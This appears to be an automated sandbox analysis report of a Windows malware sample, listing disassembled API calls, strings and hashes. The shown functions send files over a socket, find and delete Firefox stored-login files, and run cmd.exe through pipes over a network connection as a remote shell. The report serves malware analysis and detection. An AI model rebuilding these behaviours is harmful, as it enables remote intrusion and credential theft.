                                                  • Part of subcall function 00403F4D: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403FB3
                                                  • Part of subcall function 00403F4D: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403FBA
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403FC6
                                                  • Part of subcall function 00403F4D: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403FE0
                                                  • Part of subcall function 00403F4D: wcscmp.MSVCRT ref: 0040400D
                                                  • Part of subcall function 00403F4D: wcscmp.MSVCRT ref: 00404025
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 0040403D
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 0040404F
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 0040405C
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040406A
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404073
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404082
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404091
                                                • _CxxThrowException.MSVCRT(00000003,00414F18), ref: 00403D28
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00414F18), ref: 00403D33
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00403D4D
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00403D5F
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403D6C
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403D79
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403D94
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00403DC1
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403DCB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403DD7
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419288,?), ref: 00403E03
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403E0D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E33
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E3F
                                                • _CxxThrowException.MSVCRT(00000004,00414F18), ref: 00403E5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00414F18,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403E6A
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403E7C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 00403E99
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403EA3
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402447
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402451
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040246B
                                                  • Part of subcall function 004023C0: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402475
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040247F
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402489
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403EBB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403EC4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EDC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EE5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EEE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403EF7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00403F00
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403ECB
                                                  • Part of subcall function 004041EA: __EH_prolog.LIBCMT ref: 004041EF
                                                  • Part of subcall function 004041EA: closesocket.WS2_32(?), ref: 00404231
                                                  • Part of subcall function 004041EA: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,00403F34,00000000), ref: 00404243
                                                • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00403F19
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00419298,00000010,00000000,00000001,00000006), ref: 00403F21
                                                • atoi.MSVCRT(00000000), ref: 00403F28
                                                • FindClose.KERNEL32(?), ref: 00403F39
                                                • ExitThread.KERNEL32 ref: 00403F41
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                                • String ID:
                                                • API String ID: 338953085-0
                                                • Opcode ID: e4fe102e86d75fecefdd60d8df8a629f5555752c243cf6481f30faeacaea79b2
                                                • Instruction ID: cc27bc7d91e85ff8e2286a6ab4d93af355333c54bd8e6d9c49dfcc8465a49270
                                                • Opcode Fuzzy Hash: e4fe102e86d75fecefdd60d8df8a629f5555752c243cf6481f30faeacaea79b2
                                                • Instruction Fuzzy Hash: 3DC15272900119ABCB14FFA0DD49ADE7B7CEB14706F0041AAF51AE20A1EF745B99CB58
                                                Function 004065DB Relevance: 87.8, APIs: 43, Strings: 7, Instructions: 250fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 854 4065db-406691 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z * 3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z getenv ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ FindFirstFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 855 4066c2-4066d6 FindNextFileA 854->855 856 406693-4066bd FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 404857 854->856 857 4066dc-4066de 855->857 858 40687d-4068c0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 404857 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 855->858 863 406901-40691e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 856->863 862 4066df-4066e6 857->862 867 4068c2-4068c6 858->867 865 406865-406877 FindNextFileA 862->865 866 4066ec-4066f1 862->866 863->867 865->858 865->862 868 4066f7-4066fd 866->868 869 406719-40671b 868->869 870 4066ff-406701 868->870 873 40671e-406720 869->873 871 406703-40670b 870->871 872 406715-406717 870->872 871->869 874 40670d-406713 871->874 872->873 873->865 875 406726-40672b 873->875 874->868 874->872 876 406731-406737 875->876 877 406753-406755 876->877 878 406739-40673b 876->878 879 406758-40675a 877->879 880 40673d-406745 878->880 881 40674f-406751 878->881 879->865 883 406760-4067f0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 879->883 880->877 882 406747-40674d 880->882 881->879 882->876 882->881 884 4067f2-406804 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ DeleteFileA 883->884 885 40681b-406821 883->885 886 406814 884->886 887 406806-40680e GetLastError 884->887 888 406823-406835 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ DeleteFileA 885->888 889 406855-40685b 885->889 886->885 887->886 890 4068c7-4068cd 887->890 891 406837-40683f GetLastError 888->891 892 40684e 888->892 889->865 893 40685d-406863 889->893 894 4068f8-4068fb FindClose 890->894 895 406845-40684c 891->895 896 4068cf-4068d5 891->896 892->889 893->865 897 4068d7-4068f6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 404857 893->897 894->863 895->889 896->894 897->894
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 004065EE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 004065FB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,75920F00,00000000), ref: 00406608
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,75920F00,00000000), ref: 0040661A
                                                • getenv.MSVCRT ref: 00406626
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,75920F00,00000000), ref: 00406632
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040663E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00406647
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00406650
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00413A34,?,?,?,00000000), ref: 0040666A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 00406674
                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040667B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00406687
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00406695
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 004066AB
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004066CC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406774
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406781
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040678D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00406796
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040679F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 004067B9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067C6
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067D2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067DB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067E4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067F5
                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004067FC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00406904
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 0040690D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00406916
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                                                • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\=A$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 3561168790-3021229726
                                                • Opcode ID: 8dec6e1865cc65fef5d2f7a003ed874cdc0ec2c430f7498b7626bd15bcb46438
                                                • Instruction ID: e2470d7ded102eb906153271f236a5acc5975d4c50eae2a5205ef764ec797134
                                                • Opcode Fuzzy Hash: 8dec6e1865cc65fef5d2f7a003ed874cdc0ec2c430f7498b7626bd15bcb46438
                                                • Instruction Fuzzy Hash: 4991A672900149AFCF01BFA0DC699EE7F79EF15306F0485B6E402E3190EB399699CB59
                                                Function 00402AAD Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 291pipesleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402AFF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402B1E
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(004197D8,cmd.exe), ref: 00402B42
                                                • getenv.MSVCRT ref: 00402B57
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402B61
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413764), ref: 00402B6E
                                                • CreatePipe.KERNEL32(00419718,004197E8,00419768,00000000), ref: 00402BA4
                                                • CreatePipe.KERNEL32(004197D0,004197EC,00419768,00000000), ref: 00402BBE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00419720,004197F0), ref: 00402C15
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402C29
                                                • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402C31
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00402C48
                                                  • Part of subcall function 00401F9B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401FA9
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • Sleep.KERNEL32(0000012C,00000093), ref: 00402C94
                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402CBA
                                                • malloc.MSVCRT ref: 00402CCC
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402CE4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402CFE
                                                • strncmp.MSVCRT ref: 00402D06
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402D1B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402D38
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402D5E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402D75
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402D8A
                                                • free.MSVCRT ref: 00402D91
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00402DA8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402C7A
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402DCE
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413760), ref: 00402DDF
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(004197D8), ref: 00402DED
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402DFA
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402E03
                                                • WriteFile.KERNEL32(00000000), ref: 00402E10
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00402E1D
                                                • Sleep.KERNEL32(00000064), ref: 00402E2A
                                                • TerminateProcess.KERNEL32(00000000), ref: 00402E44
                                                • CloseHandle.KERNEL32 ref: 00402E56
                                                • CloseHandle.KERNEL32 ref: 00402E5E
                                                • CloseHandle.KERNEL32 ref: 00402E75
                                                • CloseHandle.KERNEL32 ref: 00402E7D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402E8B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402E94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                                • String ID: SystemDrive$cmd.exe
                                                • API String ID: 1882443052-3633465311
                                                • Opcode ID: 6bab4c7e2921adda392d72680d16ef73710547b042474502f1d0d8407c195bbc
                                                • Instruction ID: 419da016fc5bb814188602baed2b1322ca4077e3af0b71fca30b1c0fed1acb18
                                                • Opcode Fuzzy Hash: 6bab4c7e2921adda392d72680d16ef73710547b042474502f1d0d8407c195bbc
                                                • Instruction Fuzzy Hash: 9FB18F71A10205EBDB01AF61DD5DAEE7FB9EF05752F04803AE411A22E0CBB94E45CB9D
                                                Function 004106B8 Relevance: 73.8, APIs: 49, Instructions: 252serviceCOMMON
